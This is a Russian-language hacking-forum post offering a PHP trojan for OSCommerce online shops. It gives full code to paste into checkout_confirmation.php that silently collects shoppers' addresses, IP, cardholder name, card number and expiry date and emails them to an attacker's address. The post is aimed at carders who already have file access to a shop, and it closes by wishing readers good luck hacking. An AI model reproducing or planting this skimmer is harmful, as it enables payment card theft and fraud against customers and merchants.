Форум АНТИЧАТ - PHP TROJAN OSCommerce

OSCommerce один из самых популярных движков для онлайн магазинов
в нем есть встоенный модуль для оплаты кредитными картами, который является лакомым куском для хакеров и кардеров
но все чаще встречаются всяческие способы защиты приватных данных, в случае исли злоумышленник все таки получил доступ к базе данных, то остался с носом, вот наглядный пример

http://ipicture.ru/uploads/081102/13581/2A2RRE5X2z.jpg

номер карты закрыт в середине крестиками

именно для таких случаев я написал небольшой код, который будет перехватывать важную информацию

теперь имея доступ к файлам магазина, необходимо найти файл checkout_confirmation.php (он обычно находится в корневой папке шопа) и в ставить следующий код после открывающего тэга body:

PHP код:


		
			
<?

error_reporting (0);

$ip_holder = $_SERVER['REMOTE_ADDR'];

$tr_deliv_adr = tep_address_format($order->delivery['format_id'], $order->delivery, 1, ' ', ' ');

$tr_bill_adr = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', ' ');

$tr_cc_owner = $_POST["cc_owner"];

$tr_cc_number= $_POST["cc_number"];

$tr_cc_expires_month = $_POST["cc_expires_month"];

$tr_cc_expires_year= $_POST["cc_expires_year"];

$info_body = "Delivery Address: ";

$info_body .= $tr_deliv_adr."\n";

$info_body .= "----------------------------------\n";

$info_body .= "Billing Address: ";

$info_body .= $tr_bill_adr."\n";

$info_body .= "----------------------------------\n";

$info_body .= "IP holder: ".$ip_holder."\n";

$info_body .= "CC holder: ".$tr_cc_owner."\n";

$info_body .= "CC num: ".$tr_cc_number."\n";

$info_body .= "EXP: ".$tr_cc_expires_month."/".$tr_cc_expires_year."\n";

mail("your@mail.com",'!!! NEW CC !!!',$info_body,"onlineshop.com\r\n");

?>

теперь после каждой совершенной оплаты кредитной картой, на ваше мыло your@mail.com будет высылаться вся необходимая информация

http://pic.ipicture.ru/uploads/08110...Ph68dDS3da.jpg

P.S. данный код написан под модуль без использования CVV
P.P.S удачи в хеке ;)